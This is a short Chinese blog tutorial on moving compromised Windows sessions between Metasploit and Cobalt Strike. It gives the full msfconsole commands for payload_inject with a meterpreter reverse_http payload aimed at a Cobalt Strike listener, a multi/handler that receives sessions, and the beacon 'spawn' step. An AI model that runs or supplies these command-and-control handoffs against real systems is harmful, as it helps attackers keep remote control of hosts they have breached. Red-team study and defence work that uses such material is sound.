msf与cs派生会话

ZJ Lv100

MSF转CS

在CS中做好接口监听端口的准备

image-20240914010145920

在MSF中添加转接exploit

1
2
3
4
5
6
7
8
9
10
11
background                // 挂起会话
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http //payload各不相同,注意不要设置错了,这是32位的
set lhost 192.168.16.181 //设置 CS 服务端的 IP 地址.
set lport 4400 //设置 CS 服务端的监听的端口
set pid xxxx //设置程序的pid(可以不管,会自动生成一个)
set DisablePayloadHandler True
set PrependMigrate True
sessions -l //查看 会话 是多少则设置多少
set session 1 [一般是 1(上面查看的结果)]
exploit // 进行测试

image-20240914010307684

image-20240914010406568

下面这个就是我们转接过去的beacon

CS转MSF

在MSF中做好接口监听端口的准备

image-20240914003204778

1
2
3
4
5
6
use exploit/multi/handler
set payload windows/meterpreter/reverse_http //这里要设置好,协议要与下面CS的协议用一样
show options
set lhost 192.168.0.1
set lport 4445 //用于接收cs的派生会话
run //或者exploit

在CS中添加新监听

添加payload为Foreign HTTP,端口为MSF正在监听的端口

image-20240913230933632

在beacon会话中运行

1
spawn 监听器名

image-20240914004900523

image-20240914004917729

image-20240914005102622

或者在右键菜单中找到spawn进行派生会话

image-20240913220809576

  • Title: msf与cs派生会话
  • Author: ZJ
  • Created at : 2024-09-13 00:00:00
  • Updated at : 2025-01-17 01:35:06
  • Link: https://blog.overlordzj.cn/2024/09/13/操作系统/kali/msf与cs互转/
  • License: This work is licensed under CC BY-NC-SA 4.0.
Comments